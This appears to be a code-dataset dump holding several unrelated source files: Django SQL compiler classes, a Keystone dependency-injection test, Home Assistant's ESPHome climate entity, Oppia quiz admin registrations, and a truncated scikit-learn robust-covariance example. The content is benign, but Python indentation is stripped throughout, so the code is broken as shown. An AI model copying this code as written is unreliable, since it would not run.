columns, aliases = self.get_default_columns(start_alias=alias,
opts=f.rel.to._meta, as_pairs=True)
self.query.related_select_cols.extend(columns)
if self.query.alias_map[alias][JOIN_TYPE] == self.query.LOUTER:
self.query.promote_alias_chain(aliases, True)
self.query.related_select_fields.extend(f.rel.to._meta.fields)
if restricted:
next = requested.get(f.name, {})
else:
next = False
new_nullable = f.null or promote
for dupe_opts, dupe_col in dupe_set:
self.query.update_dupe_avoidance(dupe_opts, dupe_col, alias)
self.fill_related_selections(f.rel.to._meta, alias, cur_depth + 1,
used, next, restricted, new_nullable, dupe_set, avoid)
if restricted:
related_fields = [
(o.field, o.model)
for o in opts.get_all_related_objects()
if o.field.unique
]
for f, model in related_fields:
if not select_related_descend(f, restricted, requested, reverse=True):
continue
# The "avoid" set is aliases we want to avoid just for this
# particular branch of the recursion. They aren't permanently
# forbidden from reuse in the related selection tables (which is
# what "used" specifies).
avoid = avoid_set.copy()
dupe_set = orig_dupe_set.copy()
table = model._meta.db_table
int_opts = opts
alias = root_alias
alias_chain = []
chain = opts.get_base_chain(f.rel.to)
if chain is not None:
for int_model in chain:
# Proxy model have elements in base chain
# with no parents, assign the new options
# object and skip to the next base in that
# case
if not int_opts.parents[int_model]:
int_opts = int_model._meta
continue
lhs_col = int_opts.parents[int_model].column
dedupe = lhs_col in opts.duplicate_targets
if dedupe:
avoid.update((self.query.dupe_avoidance.get(id(opts), lhs_col),
()))
dupe_set.add((opts, lhs_col))
int_opts = int_model._meta
alias = self.query.join(
(alias, int_opts.db_table, lhs_col, int_opts.pk.column),
exclusions=used, promote=True, reuse=used
)
alias_chain.append(alias)
for dupe_opts, dupe_col in dupe_set:
self.query.update_dupe_avoidance(dupe_opts, dupe_col, alias)
dedupe = f.column in opts.duplicate_targets
if dupe_set or dedupe:
avoid.update(self.query.dupe_avoidance.get((id(opts), f.column), ()))
if dedupe:
dupe_set.add((opts, f.column))
alias = self.query.join(
(alias, table, f.rel.get_related_field().column, f.column),
exclusions=used.union(avoid),
promote=True
)
used.add(alias)
columns, aliases = self.get_default_columns(start_alias=alias,
opts=model._meta, as_pairs=True, local_only=True)
self.query.related_select_cols.extend(columns)
self.query.related_select_fields.extend(model._meta.fields)
next = requested.get(f.related_query_name(), {})
new_nullable = f.null or None
self.fill_related_selections(model._meta, table, cur_depth+1,
used, next, restricted, new_nullable)
def deferred_to_columns(self):
"""
Converts the self.deferred_loading data structure to mapping of table
names to sets of column names which are to be loaded. Returns the
dictionary.
"""
columns = {}
self.query.deferred_to_data(columns, self.query.deferred_to_columns_cb)
return columns
def results_iter(self):
"""
Returns an iterator over the results from executing this query.
"""
resolve_columns = hasattr(self, 'resolve_columns')
fields = None
for rows in self.execute_sql(MULTI):
for row in rows:
if resolve_columns:
if fields is None:
# We only set this up here because
# related_select_fields isn't populated until
# execute_sql() has been called.
if self.query.select_fields:
fields = self.query.select_fields + self.query.related_select_fields
else:
fields = self.query.model._meta.fields
# If the field was deferred, exclude it from being passed
# into `resolve_columns` because it wasn't selected.
only_load = self.deferred_to_columns()
if only_load:
db_table = self.query.model._meta.db_table
fields = [f for f in fields if db_table in only_load and
f.column in only_load[db_table]]
row = self.resolve_columns(row, fields)
if self.query.aggregate_select:
aggregate_start = len(self.query.extra_select.keys()) + len(self.query.select)
aggregate_end = aggregate_start + len(self.query.aggregate_select)
row = tuple(row[:aggregate_start]) + tuple([
self.query.resolve_aggregate(value, aggregate, self.connection)
for (alias, aggregate), value
in zip(self.query.aggregate_select.items(), row[aggregate_start:aggregate_end])
]) + tuple(row[aggregate_end:])
yield row
def has_results(self):
# This is always executed on a query clone, so we can modify self.query
self.query.add_extra({'a': 1}, None, None, None, None, None)
self.query.set_extra_mask(('a',))
return bool(self.execute_sql(SINGLE))
def execute_sql(self, result_type=MULTI):
"""
Run the query against the database and returns the result(s). The
return value is a single data item if result_type is SINGLE, or an
iterator over the results if the result_type is MULTI.
result_type is either MULTI (use fetchmany() to retrieve all rows),
SINGLE (only retrieve a single row), or None. In this last case, the
cursor is returned if any query is executed, since it's used by
subclasses such as InsertQuery). It's possible, however, that no query
is needed, as the filters describe an empty set. In that case, None is
returned, to avoid any unnecessary database interaction.
"""
try:
sql, params = self.as_sql()
if not sql:
raise EmptyResultSet
except EmptyResultSet:
if result_type == MULTI:
return empty_iter()
else:
return
cursor = self.connection.cursor()
cursor.execute(sql, params)
if not result_type:
return cursor
if result_type == SINGLE:
if self.query.ordering_aliases:
return cursor.fetchone()[:-len(self.query.ordering_aliases)]
return cursor.fetchone()
# The MULTI case.
if self.query.ordering_aliases:
result = order_modified_iter(cursor, len(self.query.ordering_aliases),
self.connection.features.empty_fetchmany_value)
else:
result = iter((lambda: cursor.fetchmany(GET_ITERATOR_CHUNK_SIZE)),
self.connection.features.empty_fetchmany_value)
if not self.connection.features.can_use_chunked_reads:
# If we are using non-chunked reads, we return the same data
# structure as normally, but ensure it is all read into memory
# before going any further.
return list(result)
return result
class SQLInsertCompiler(SQLCompiler):
def placeholder(self, field, val):
if field is None:
# A field value of None means the value is raw.
return val
elif hasattr(field, 'get_placeholder'):
# Some fields (e.g. geo fields) need special munging before
# they can be inserted.
return field.get_placeholder(val, self.connection)
else:
# Return the common case for the placeholder
return '%s'
def as_sql(self):
# We don't need quote_name_unless_alias() here, since these are all
# going to be column names (so we can avoid the extra overhead).
qn = self.connection.ops.quote_name
opts = self.query.model._meta
result = ['INSERT INTO %s' % qn(opts.db_table)]
result.append('(%s)' % ', '.join([qn(c) for c in self.query.columns]))
values = [self.placeholder(*v) for v in self.query.values]
result.append('VALUES (%s)' % ', '.join(values))
params = self.query.params
if self.return_id and self.connection.features.can_return_id_from_insert:
col = "%s.%s" % (qn(opts.db_table), qn(opts.pk.column))
r_fmt, r_params = self.connection.ops.return_insert_id()
result.append(r_fmt % col)
params = params + r_params
return ' '.join(result), params
def execute_sql(self, return_id=False):
self.return_id = return_id
cursor = super(SQLInsertCompiler, self).execute_sql(None)
if not (return_id and cursor):
return
if self.connection.features.can_return_id_from_insert:
return self.connection.ops.fetch_returned_insert_id(cursor)
return self.connection.ops.last_insert_id(cursor,
self.query.model._meta.db_table, self.query.model._meta.pk.column)
class SQLDeleteCompiler(SQLCompiler):
def as_sql(self):
"""
Creates the SQL for this query. Returns the SQL string and list of
parameters.
"""
assert len(self.query.tables) == 1, \
"Can only delete from one table at a time."
qn = self.quote_name_unless_alias
result = ['DELETE FROM %s' % qn(self.query.tables[0])]
where, params = self.query.where.as_sql(qn=qn, connection=self.connection)
result.append('WHERE %s' % where)
return ' '.join(result), tuple(params)
class SQLUpdateCompiler(SQLCompiler):
def as_sql(self):
"""
Creates the SQL for this query. Returns the SQL string and list of
parameters.
"""
from django.db.models.base import Model
self.pre_sql_setup()
if not self.query.values:
return '', ()
table = self.query.tables[0]
qn = self.quote_name_unless_alias
result = ['UPDATE %s' % qn(table)]
result.append('SET')
values, update_params = [], []
for field, model, val in self.query.values:
if hasattr(val, 'prepare_database_save'):
val = val.prepare_database_save(field)
else:
val = field.get_db_prep_save(val, connection=self.connection)
# Getting the placeholder for the field.
if hasattr(field, 'get_placeholder'):
placeholder = field.get_placeholder(val, self.connection)
else:
placeholder = '%s'
if hasattr(val, 'evaluate'):
val = SQLEvaluator(val, self.query, allow_joins=False)
name = field.column
if hasattr(val, 'as_sql'):
sql, params = val.as_sql(qn, self.connection)
values.append('%s = %s' % (qn(name), sql))
update_params.extend(params)
elif val is not None:
values.append('%s = %s' % (qn(name), placeholder))
update_params.append(val)
else:
values.append('%s = NULL' % qn(name))
if not values:
return '', ()
result.append(', '.join(values))
where, params = self.query.where.as_sql(qn=qn, connection=self.connection)
if where:
result.append('WHERE %s' % where)
return ' '.join(result), tuple(update_params + params)
def execute_sql(self, result_type):
"""
Execute the specified update. Returns the number of rows affected by
the primary update query. The "primary update query" is the first
non-empty query that is executed. Row counts for any subsequent,
related queries are not available.
"""
cursor = super(SQLUpdateCompiler, self).execute_sql(result_type)
rows = cursor and cursor.rowcount or 0
is_empty = cursor is None
del cursor
for query in self.query.get_related_updates():
aux_rows = query.get_compiler(self.using).execute_sql(result_type)
if is_empty:
rows = aux_rows
is_empty = False
return rows
def pre_sql_setup(self):
"""
If the update depends on results from other tables, we need to do some
munging of the "where" conditions to match the format required for
(portable) SQL updates. That is done here.
Further, if we are going to be running multiple updates, we pull out
the id values to update at this point so that they don't change as a
result of the progressive updates.
"""
self.query.select_related = False
self.query.clear_ordering(True)
super(SQLUpdateCompiler, self).pre_sql_setup()
count = self.query.count_active_tables()
if not self.query.related_updates and count == 1:
return
# We need to use a sub-select in the where clause to filter on things
# from other tables.
query = self.query.clone(klass=Query)
query.bump_prefix()
query.extra = {}
query.select = []
query.add_fields([query.model._meta.pk.name])
must_pre_select = count > 1 and not self.connection.features.update_can_self_select
# Now we adjust the current query: reset the where clause and get rid
# of all the tables we don't need (since they're in the sub-select).
self.query.where = self.query.where_class()
if self.query.related_updates or must_pre_select:
# Either we're using the idents in multiple update queries (so
# don't want them to change), or the db backend doesn't support
# selecting from the updating table (e.g. MySQL).
idents = []
for rows in query.get_compiler(self.using).execute_sql(MULTI):
idents.extend([r[0] for r in rows])
self.query.add_filter(('pk__in', idents))
self.query.related_ids = idents
else:
# The fast path. Filters and updates in one query.
self.query.add_filter(('pk__in', query))
for alias in self.query.tables[1:]:
self.query.alias_refcount[alias] = 0
class SQLAggregateCompiler(SQLCompiler):
def as_sql(self, qn=None):
"""
Creates the SQL for this query. Returns the SQL string and list of
parameters.
"""
if qn is None:
qn = self.quote_name_unless_alias
sql = ('SELECT %s FROM (%s) subquery' % (
', '.join([
aggregate.as_sql(qn, self.connection)
for aggregate in self.query.aggregate_select.values()
]),
self.query.subquery)
)
params = self.query.sub_params
return (sql, params)
class SQLDateCompiler(SQLCompiler):
def results_iter(self):
"""
Returns an iterator over the results from executing this query.
"""
resolve_columns = hasattr(self, 'resolve_columns')
if resolve_columns:
from django.db.models.fields import DateTimeField
fields = [DateTimeField()]
else:
from django.db.backends.util import typecast_timestamp
needs_string_cast = self.connection.features.needs_datetime_string_cast
offset = len(self.query.extra_select)
for rows in self.execute_sql(MULTI):
for row in rows:
date = row[offset]
if resolve_columns:
date = self.resolve_columns(row, fields)[offset]
elif needs_string_cast:
date = typecast_timestamp(str(date))
yield date
def empty_iter():
"""
Returns an iterator containing no results.
"""
yield iter([]).next()
def order_modified_iter(cursor, trim, sentinel):
"""
Yields blocks of rows from a cursor. We use this iterator in the special
case when extra output columns have been added to support ordering
requirements. We must trim those extra columns before anything else can use
the results, since they're only needed to make the SQL valid.
"""
for rows in iter((lambda: cursor.fetchmany(GET_ITERATOR_CHUNK_SIZE)),
sentinel):
yield [r[:-trim] for r in rows]
| bsd-3-clause | 6,440,348,684,551,839,000 | 42.837233 | 108 | 0.534884 | false |
ilay09/keystone | keystone/tests/unit/common/test_injection.py | 14 | 7730 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from keystone.common import dependency
from keystone.tests import unit
class TestDependencyInjection(unit.BaseTestCase):
def setUp(self):
super(TestDependencyInjection, self).setUp()
dependency.reset()
self.addCleanup(dependency.reset)
def test_dependency_injection(self):
class Interface(object):
def do_work(self):
assert False
@dependency.provider('first_api')
class FirstImplementation(Interface):
def do_work(self):
return True
@dependency.provider('second_api')
class SecondImplementation(Interface):
def do_work(self):
return True
@dependency.requires('first_api', 'second_api')
class Consumer(object):
def do_work_with_dependencies(self):
assert self.first_api.do_work()
assert self.second_api.do_work()
# initialize dependency providers
first_api = FirstImplementation()
second_api = SecondImplementation()
# ... sometime later, initialize a dependency consumer
consumer = Consumer()
# the expected dependencies should be available to the consumer
self.assertIs(consumer.first_api, first_api)
self.assertIs(consumer.second_api, second_api)
self.assertIsInstance(consumer.first_api, Interface)
self.assertIsInstance(consumer.second_api, Interface)
consumer.do_work_with_dependencies()
def test_dependency_provider_configuration(self):
@dependency.provider('api')
class Configurable(object):
def __init__(self, value=None):
self.value = value
def get_value(self):
return self.value
@dependency.requires('api')
class Consumer(object):
def get_value(self):
return self.api.get_value()
# initialize dependency providers
api = Configurable(value=True)
# ... sometime later, initialize a dependency consumer
consumer = Consumer()
# the expected dependencies should be available to the consumer
self.assertIs(consumer.api, api)
self.assertIsInstance(consumer.api, Configurable)
self.assertTrue(consumer.get_value())
def test_dependency_consumer_configuration(self):
@dependency.provider('api')
class Provider(object):
def get_value(self):
return True
@dependency.requires('api')
class Configurable(object):
def __init__(self, value=None):
self.value = value
def get_value(self):
if self.value:
return self.api.get_value()
# initialize dependency providers
api = Provider()
# ... sometime later, initialize a dependency consumer
consumer = Configurable(value=True)
# the expected dependencies should be available to the consumer
self.assertIs(consumer.api, api)
self.assertIsInstance(consumer.api, Provider)
self.assertTrue(consumer.get_value())
def test_inherited_dependency(self):
class Interface(object):
def do_work(self):
assert False
@dependency.provider('first_api')
class FirstImplementation(Interface):
def do_work(self):
return True
@dependency.provider('second_api')
class SecondImplementation(Interface):
def do_work(self):
return True
@dependency.requires('first_api')
class ParentConsumer(object):
def do_work_with_dependencies(self):
assert self.first_api.do_work()
@dependency.requires('second_api')
class ChildConsumer(ParentConsumer):
def do_work_with_dependencies(self):
assert self.second_api.do_work()
super(ChildConsumer, self).do_work_with_dependencies()
# initialize dependency providers
first_api = FirstImplementation()
second_api = SecondImplementation()
# ... sometime later, initialize a dependency consumer
consumer = ChildConsumer()
# dependencies should be naturally inherited
self.assertEqual(
set(['first_api']),
ParentConsumer._dependencies)
self.assertEqual(
set(['first_api', 'second_api']),
ChildConsumer._dependencies)
self.assertEqual(
set(['first_api', 'second_api']),
consumer._dependencies)
# the expected dependencies should be available to the consumer
self.assertIs(consumer.first_api, first_api)
self.assertIs(consumer.second_api, second_api)
self.assertIsInstance(consumer.first_api, Interface)
self.assertIsInstance(consumer.second_api, Interface)
consumer.do_work_with_dependencies()
def test_unresolvable_dependency(self):
@dependency.requires(uuid.uuid4().hex)
class Consumer(object):
pass
def for_test():
Consumer()
dependency.resolve_future_dependencies()
self.assertRaises(dependency.UnresolvableDependencyException, for_test)
def test_circular_dependency(self):
p1_name = uuid.uuid4().hex
p2_name = uuid.uuid4().hex
@dependency.provider(p1_name)
@dependency.requires(p2_name)
class P1(object):
pass
@dependency.provider(p2_name)
@dependency.requires(p1_name)
class P2(object):
pass
p1 = P1()
p2 = P2()
dependency.resolve_future_dependencies()
self.assertIs(getattr(p1, p2_name), p2)
self.assertIs(getattr(p2, p1_name), p1)
def test_reset(self):
# Can reset the registry of providers.
p_id = uuid.uuid4().hex
@dependency.provider(p_id)
class P(object):
pass
p_inst = P()
self.assertIs(dependency.get_provider(p_id), p_inst)
dependency.reset()
self.assertFalse(dependency._REGISTRY)
def test_get_provider(self):
# Can get the instance of a provider using get_provider
provider_name = uuid.uuid4().hex
@dependency.provider(provider_name)
class P(object):
pass
provider_instance = P()
retrieved_provider_instance = dependency.get_provider(provider_name)
self.assertIs(provider_instance, retrieved_provider_instance)
def test_get_provider_not_provided_error(self):
# If no provider and provider is required then fails.
provider_name = uuid.uuid4().hex
self.assertRaises(KeyError, dependency.get_provider, provider_name)
def test_get_provider_not_provided_optional(self):
# If no provider and provider is optional then returns None.
provider_name = uuid.uuid4().hex
self.assertIsNone(dependency.get_provider(provider_name,
dependency.GET_OPTIONAL))
| apache-2.0 | 5,019,655,915,812,358,000 | 31.478992 | 79 | 0.621087 | false |
home-assistant/home-assistant | homeassistant/components/esphome/climate.py | 5 | 9358 | """Support for ESPHome climate devices."""
from __future__ import annotations
from aioesphomeapi import (
ClimateAction,
ClimateFanMode,
ClimateInfo,
ClimateMode,
ClimateState,
ClimateSwingMode,
)
from homeassistant.components.climate import ClimateEntity
from homeassistant.components.climate.const import (
ATTR_HVAC_MODE,
ATTR_TARGET_TEMP_HIGH,
ATTR_TARGET_TEMP_LOW,
CURRENT_HVAC_COOL,
CURRENT_HVAC_DRY,
CURRENT_HVAC_FAN,
CURRENT_HVAC_HEAT,
CURRENT_HVAC_IDLE,
CURRENT_HVAC_OFF,
FAN_AUTO,
FAN_DIFFUSE,
FAN_FOCUS,
FAN_HIGH,
FAN_LOW,
FAN_MEDIUM,
FAN_MIDDLE,
FAN_OFF,
FAN_ON,
HVAC_MODE_COOL,
HVAC_MODE_DRY,
HVAC_MODE_FAN_ONLY,
HVAC_MODE_HEAT,
HVAC_MODE_HEAT_COOL,
HVAC_MODE_OFF,
PRESET_AWAY,
PRESET_HOME,
SUPPORT_FAN_MODE,
SUPPORT_PRESET_MODE,
SUPPORT_SWING_MODE,
SUPPORT_TARGET_TEMPERATURE,
SUPPORT_TARGET_TEMPERATURE_RANGE,
SWING_BOTH,
SWING_HORIZONTAL,
SWING_OFF,
SWING_VERTICAL,
)
from homeassistant.const import (
ATTR_TEMPERATURE,
PRECISION_HALVES,
PRECISION_TENTHS,
PRECISION_WHOLE,
TEMP_CELSIUS,
)
from . import (
EsphomeEntity,
esphome_map_enum,
esphome_state_property,
platform_async_setup_entry,
)
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up ESPHome climate devices based on a config entry."""
await platform_async_setup_entry(
hass,
entry,
async_add_entities,
component_key="climate",
info_type=ClimateInfo,
entity_type=EsphomeClimateEntity,
state_type=ClimateState,
)
@esphome_map_enum
def _climate_modes():
return {
ClimateMode.OFF: HVAC_MODE_OFF,
ClimateMode.AUTO: HVAC_MODE_HEAT_COOL,
ClimateMode.COOL: HVAC_MODE_COOL,
ClimateMode.HEAT: HVAC_MODE_HEAT,
ClimateMode.FAN_ONLY: HVAC_MODE_FAN_ONLY,
ClimateMode.DRY: HVAC_MODE_DRY,
}
@esphome_map_enum
def _climate_actions():
return {
ClimateAction.OFF: CURRENT_HVAC_OFF,
ClimateAction.COOLING: CURRENT_HVAC_COOL,
ClimateAction.HEATING: CURRENT_HVAC_HEAT,
ClimateAction.IDLE: CURRENT_HVAC_IDLE,
ClimateAction.DRYING: CURRENT_HVAC_DRY,
ClimateAction.FAN: CURRENT_HVAC_FAN,
}
@esphome_map_enum
def _fan_modes():
return {
ClimateFanMode.ON: FAN_ON,
ClimateFanMode.OFF: FAN_OFF,
ClimateFanMode.AUTO: FAN_AUTO,
ClimateFanMode.LOW: FAN_LOW,
ClimateFanMode.MEDIUM: FAN_MEDIUM,
ClimateFanMode.HIGH: FAN_HIGH,
ClimateFanMode.MIDDLE: FAN_MIDDLE,
ClimateFanMode.FOCUS: FAN_FOCUS,
ClimateFanMode.DIFFUSE: FAN_DIFFUSE,
}
@esphome_map_enum
def _swing_modes():
return {
ClimateSwingMode.OFF: SWING_OFF,
ClimateSwingMode.BOTH: SWING_BOTH,
ClimateSwingMode.VERTICAL: SWING_VERTICAL,
ClimateSwingMode.HORIZONTAL: SWING_HORIZONTAL,
}
class EsphomeClimateEntity(EsphomeEntity, ClimateEntity):
"""A climate implementation for ESPHome."""
@property
def _static_info(self) -> ClimateInfo:
return super()._static_info
@property
def _state(self) -> ClimateState | None:
return super()._state
@property
def precision(self) -> float:
"""Return the precision of the climate device."""
precicions = [PRECISION_WHOLE, PRECISION_HALVES, PRECISION_TENTHS]
for prec in precicions:
if self._static_info.visual_temperature_step >= prec:
return prec
# Fall back to highest precision, tenths
return PRECISION_TENTHS
@property
def temperature_unit(self) -> str:
"""Return the unit of measurement used by the platform."""
return TEMP_CELSIUS
@property
def hvac_modes(self) -> list[str]:
"""Return the list of available operation modes."""
return [
_climate_modes.from_esphome(mode)
for mode in self._static_info.supported_modes
]
@property
def fan_modes(self):
"""Return the list of available fan modes."""
return [
_fan_modes.from_esphome(mode)
for mode in self._static_info.supported_fan_modes
]
@property
def preset_modes(self):
"""Return preset modes."""
return [PRESET_AWAY, PRESET_HOME] if self._static_info.supports_away else []
@property
def swing_modes(self):
"""Return the list of available swing modes."""
return [
_swing_modes.from_esphome(mode)
for mode in self._static_info.supported_swing_modes
]
@property
def target_temperature_step(self) -> float:
"""Return the supported step of target temperature."""
# Round to one digit because of floating point math
return round(self._static_info.visual_temperature_step, 1)
@property
def min_temp(self) -> float:
"""Return the minimum temperature."""
return self._static_info.visual_min_temperature
@property
def max_temp(self) -> float:
"""Return the maximum temperature."""
return self._static_info.visual_max_temperature
@property
def supported_features(self) -> int:
"""Return the list of supported features."""
features = 0
if self._static_info.supports_two_point_target_temperature:
features |= SUPPORT_TARGET_TEMPERATURE_RANGE
else:
features |= SUPPORT_TARGET_TEMPERATURE
if self._static_info.supports_away:
features |= SUPPORT_PRESET_MODE
if self._static_info.supported_fan_modes:
features |= SUPPORT_FAN_MODE
if self._static_info.supported_swing_modes:
features |= SUPPORT_SWING_MODE
return features
# https://github.com/PyCQA/pylint/issues/3150 for all @esphome_state_property
# pylint: disable=invalid-overridden-method
@esphome_state_property
def hvac_mode(self) -> str | None:
"""Return current operation ie. heat, cool, idle."""
return _climate_modes.from_esphome(self._state.mode)
@esphome_state_property
def hvac_action(self) -> str | None:
"""Return current action."""
# HA has no support feature field for hvac_action
if not self._static_info.supports_action:
return None
return _climate_actions.from_esphome(self._state.action)
@esphome_state_property
def fan_mode(self):
"""Return current fan setting."""
return _fan_modes.from_esphome(self._state.fan_mode)
@esphome_state_property
def preset_mode(self):
"""Return current preset mode."""
return PRESET_AWAY if self._state.away else PRESET_HOME
@esphome_state_property
def swing_mode(self):
"""Return current swing mode."""
return _swing_modes.from_esphome(self._state.swing_mode)
@esphome_state_property
def current_temperature(self) -> float | None:
"""Return the current temperature."""
return self._state.current_temperature
@esphome_state_property
def target_temperature(self) -> float | None:
"""Return the temperature we try to reach."""
return self._state.target_temperature
@esphome_state_property
def target_temperature_low(self) -> float | None:
"""Return the lowbound target temperature we try to reach."""
return self._state.target_temperature_low
@esphome_state_property
def target_temperature_high(self) -> float | None:
"""Return the highbound target temperature we try to reach."""
return self._state.target_temperature_high
async def async_set_temperature(self, **kwargs) -> None:
"""Set new target temperature (and operation mode if set)."""
data = {"key": self._static_info.key}
if ATTR_HVAC_MODE in kwargs:
data["mode"] = _climate_modes.from_hass(kwargs[ATTR_HVAC_MODE])
if ATTR_TEMPERATURE in kwargs:
data["target_temperature"] = kwargs[ATTR_TEMPERATURE]
if ATTR_TARGET_TEMP_LOW in kwargs:
data["target_temperature_low"] = kwargs[ATTR_TARGET_TEMP_LOW]
if ATTR_TARGET_TEMP_HIGH in kwargs:
data["target_temperature_high"] = kwargs[ATTR_TARGET_TEMP_HIGH]
await self._client.climate_command(**data)
async def async_set_hvac_mode(self, hvac_mode: str) -> None:
"""Set new target operation mode."""
await self._client.climate_command(
key=self._static_info.key, mode=_climate_modes.from_hass(hvac_mode)
)
async def async_set_preset_mode(self, preset_mode):
"""Set preset mode."""
away = preset_mode == PRESET_AWAY
await self._client.climate_command(key=self._static_info.key, away=away)
async def async_set_fan_mode(self, fan_mode: str) -> None:
"""Set new fan mode."""
await self._client.climate_command(
key=self._static_info.key, fan_mode=_fan_modes.from_hass(fan_mode)
)
async def async_set_swing_mode(self, swing_mode: str) -> None:
"""Set new swing mode."""
await self._client.climate_command(
key=self._static_info.key, swing_mode=_swing_modes.from_hass(swing_mode)
)
| apache-2.0 | 428,674,981,804,760,640 | 30.089701 | 84 | 0.635713 | false |
DigitalCampus/django-ujjwal-oppia | oppia/quiz/admin.py | 6 | 1718 | # oppia/quiz/admin.py
from django.contrib import admin
from oppia.quiz.models import Quiz, Question, Response, ResponseProps, QuestionProps
from oppia.quiz.models import QuizProps, QuizQuestion, QuizAttempt, QuizAttemptResponse
class QuizAttemptAdmin(admin.ModelAdmin):
list_display = ('user', 'quiz', 'attempt_date', 'score', 'ip', 'instance_id','agent')
class QuestionPropsAdmin(admin.ModelAdmin):
list_display = ('question', 'name', 'value')
class ResponsePropsAdmin(admin.ModelAdmin):
list_display = ('response', 'name', 'value')
class QuizPropsAdmin(admin.ModelAdmin):
list_display = ('quiz', 'name', 'value')
class QuestionAdmin(admin.ModelAdmin):
list_display = ('owner', 'title', 'type','created_date','lastupdated_date')
class QuizAttemptResponseAdmin(admin.ModelAdmin):
list_display = ('question', 'score', 'text')
class QuizAdmin(admin.ModelAdmin):
list_display = ('title', 'description', 'owner', 'created_date','lastupdated_date','draft','deleted')
class ResponseAdmin(admin.ModelAdmin):
list_display = ('question', 'title', 'owner', 'created_date','lastupdated_date','score','order')
class QuizQuestionAdmin(admin.ModelAdmin):
list_display = ('quiz', 'question', 'order')
admin.site.register(Quiz, QuizAdmin)
admin.site.register(Question,QuestionAdmin)
admin.site.register(Response,ResponseAdmin)
admin.site.register(ResponseProps, ResponsePropsAdmin)
admin.site.register(QuestionProps, QuestionPropsAdmin)
admin.site.register(QuizProps, QuizPropsAdmin)
admin.site.register(QuizQuestion, QuizQuestionAdmin)
admin.site.register(QuizAttempt, QuizAttemptAdmin)
admin.site.register(QuizAttemptResponse, QuizAttemptResponseAdmin) | gpl-3.0 | 4,412,428,456,045,342,000 | 39.928571 | 106 | 0.74447 | false |
DailyActie/Surrogate-Model | 01-codes/scikit-learn-master/examples/covariance/plot_mahalanobis_distances.py | 1 | 6231 | r"""
================================================================
Robust covariance estimation and Mahalanobis distances relevance
================================================================
An example to show covariance estimation with the Mahalanobis
distances on Gaussian distributed data.
For Gaussian distributed data, the distance of an observation
:math:`x_i` to the mode of the distribution can be computed using its
Mahalanobis distance: :math:`d_{(\mu,\Sigma)}(x_i)^2 = (x_i -
\mu)'\Sigma^{-1}(x_i - \mu)` where :math:`\mu` and :math:`\Sigma` are
the location and the covariance of the underlying Gaussian
distribution.
In practice, :math:`\mu` and :math:`\Sigma` are replaced by some
estimates. The usual covariance maximum likelihood estimate is very
sensitive to the presence of outliers in the data set and therefor,
the corresponding Mahalanobis distances are. One would better have to
use a robust estimator of covariance to guarantee that the estimation is
resistant to "erroneous" observations in the data set and that the
associated Mahalanobis distances accurately reflect the true
organisation of the observations.
The Minimum Covariance Determinant estimator is a robust,
high-breakdown point (i.e. it can be used to estimate the covariance
matrix of highly contaminated datasets, up to
:math:`\frac{n_\text{samples}-n_\text{features}-1}{2}` outliers)
estimator of covariance. The idea is to find
:math:`\frac{n_\text{samples}+n_\text{features}+1}{2}`
observations whose empirical covariance has the smallest determinant,
yielding a "pure" subset of observations from which to compute
standards estimates of location and covariance.
The Minimum Covariance Determinant estimator (MCD) has been introduced
by P.J.Rousseuw in [1].
This example illustrates how the Mahalanobis distances are affected by
outlying data: observations drawn from a contaminating distribution
are not distinguishable from the observations coming from the real,
Gaussian distribution that one may want to work with. Using MCD-based
Mahalanobis distances, the two populations become
distinguishable. Associated applications are outliers detection,
observations ranking, clustering, ...
For visualization purpose, the cubic root of the Mahalanobis distances
are represented in the boxplot, as Wilson and Hilferty suggest [2]
[1] P. J. Rousseeuw. Least median of squares regression. J. Am
Stat Ass, 79:871, 1984.
[2] Wilson, E. B., & Hilferty, M. M. (1931). The distribution of chi-square.
Proceedings of the National Academy of Sciences of the United States
of America, 17, 684-688.
"""
print(__doc__)
import matplotlib.pyplot as plt
import numpy as np
from sklearn.covariance import EmpiricalCovariance, MinCovDet
n_samples = 125
n_outliers = 25
n_features = 2
# generate data
gen_cov = np.eye(n_features)
gen_cov[0, 0] = 2.
X = np.dot(np.random.randn(n_samples, n_features), gen_cov)
# add some outliers
outliers_cov = np.eye(n_features)
outliers_cov[np.arange(1, n_features), np.arange(1, n_features)] = 7.
X[-n_outliers:] = np.dot(np.random.randn(n_outliers, n_features), outliers_cov)
# fit a Minimum Covariance Determinant (MCD) robust estimator to data
robust_cov = MinCovDet().fit(X)
# compare estimators learnt from the full data set with true parameters
emp_cov = EmpiricalCovariance().fit(X)
###############################################################################
# Display results
fig = plt.figure()
plt.subplots_adjust(hspace=-.1, wspace=.4, top=.95, bottom=.05)
# Show data set
subfig1 = plt.subplot(3, 1, 1)
inlier_plot = subfig1.scatter(X[:, 0], X[:, 1],
color='black', label='inliers')
outlier_plot = subfig1.scatter(X[:, 0][-n_outliers:], X[:, 1][-n_outliers:],
color='red', label='outliers')
subfig1.set_xlim(subfig1.get_xlim()[0], 11.)
subfig1.set_title("Mahalanobis distances of a contaminated data set:")
# Show contours of the distance functions
xx, yy = np.meshgrid(np.linspace(plt.xlim()[0], plt.xlim()[1], 100),
np.linspace(plt.ylim()[0], plt.ylim()[1], 100))
zz = np.c_[xx.ravel(), yy.ravel()]
mahal_emp_cov = emp_cov.mahalanobis(zz)
mahal_emp_cov = mahal_emp_cov.reshape(xx.shape)
emp_cov_contour = subfig1.contour(xx, yy, np.sqrt(mahal_emp_cov),
cmap=plt.cm.PuBu_r,
linestyles='dashed')
mahal_robust_cov = robust_cov.mahalanobis(zz)
mahal_robust_cov = mahal_robust_cov.reshape(xx.shape)
robust_contour = subfig1.contour(xx, yy, np.sqrt(mahal_robust_cov),
cmap=plt.cm.YlOrBr_r, linestyles='dotted')
subfig1.legend([emp_cov_contour.collections[1], robust_contour.collections[1],
inlier_plot, outlier_plot],
['MLE dist', 'robust dist', 'inliers', 'outliers'],
loc="upper right", borderaxespad=0)
plt.xticks(())
plt.yticks(())
# Plot the scores for each point
emp_mahal = emp_cov.mahalanobis(X - np.mean(X, 0)) ** (0.33)
subfig2 = plt.subplot(2, 2, 3)
subfig2.boxplot([emp_mahal[:-n_outliers], emp_mahal[-n_outliers:]], widths=.25)
subfig2.plot(1.26 * np.ones(n_samples - n_outliers),
